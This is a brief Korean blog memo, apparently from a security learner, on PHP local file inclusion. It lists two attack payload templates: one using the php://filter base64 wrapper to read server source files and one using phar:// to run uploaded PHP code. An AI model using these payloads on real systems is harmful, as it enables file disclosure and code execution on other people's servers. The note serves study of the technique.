웹
LFI와 이를 돕는 php wrapping (링크)
shnec
2017. 2. 2. 02:51
?p=php://filter/convert.base64-encode/resource=(filename)
http://www.php.net/manual/en/filters.php
lfi 공격 잘정리됨
LFI로 올린 php코드를
phar로 실행시킬수 있다.
?p=phar://(경로)